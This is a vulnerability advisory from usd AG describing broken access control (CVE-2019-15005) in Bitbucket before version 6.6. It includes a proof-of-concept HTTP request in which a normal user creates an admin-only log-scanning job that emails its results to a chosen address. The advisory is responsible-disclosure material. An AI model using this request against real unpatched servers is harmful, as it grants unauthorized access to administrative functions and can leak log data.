usd-2019-0016 | Bitbucket v5.10.1 – Broken Access Control 2

Advisory ID: usd-2019-0016
CVE Number: CVE-2019-15005
Affected Product: Bitbucket
Affected Version: < v6.6
Vulnerability Type: Broken Access Control
Security Risk: High
Vendor URL:
Vendor Status: Fixed


Access control, sometimes called authorization, is how a web application grants access to content and functions to some users and not others.
These checks are performed after authentication, and govern what ‘authorized’ users are allowed to do. Access control sounds like a simple problem but is insidiously difficult to implement correctly.
A web application’s access control model is closely tied to the content and functions that the site provides. In addition, the users may fall into a number of groups or roles with different abilities or privileges.

Proof of Concept (PoC)

Inside the endpoint „/rest/troubleshooting/latest/hercules/periodicScanner/settings“ an administrator can create a job for scanning logfiles periodicaly.
Unpriviliged users don’t have access to the GUI which configures such jobs. But unprivileged users can successfully send a request to create a scanning job.
In particular they can state an email address, to which the results will be send.

Request (send from an normal user):

POST /rest/troubleshooting/latest/hercules/periodicScanner/settings HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Atlassian-Token: no-check
X-Requested-With: XMLHttpRequest
Content-Length: 139
Cookie: BITBUCKETSESSIONID=7C0B64E8BD71F211473E99B718E58CC7;
DNT: 1
Connection: close
HTTP/1.1 200
Vary: Accept-Encoding
Content-Type: application/json
Date: Thu, 07 Mar 2019 11:46:53 GMT
Connection: close
Content-Length: 83
{"feedback":"This job will be run daily starting at 3/8/19 2:04 AM (server time)."}


Protect endpoints, which provide sensitive functionalities, with proper access control.


  • 2019-03-28 Vulnerability securely submitted to
  • 2019-08-27 Atlassian releases Bitbucket 6.6.0 which addresses the vulnerability
  • 2019-10-21 First Published


This security vulnerabilities were found by Tobias Neitzel and Julian Frey of usd AG.


In order to protect businesses against hackers and criminals, we always have to keep our skills and knowledge up to date. Thus, security research is just as important for our work as is building up a security community to promote the exchange of knowledge. After all, more security can only be achieved if many individuals take on the task.

Our CST Academy and our usd HeroLab are essential parts of our security mission. We share the knowledge we gain in our practical work and our research through training courses and publications. In this context, the usd HeroLab publishes a series of papers on new vulnerabilities and current security issues.

Always for the sake of our mission: „more security.“

to usd AG

In accordance with usd AG’s Responsible Disclosure Policy, all vendors have been notified of the existence of these vulnerabilities.


The information provided in this security advisory is provided „as is“ and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible.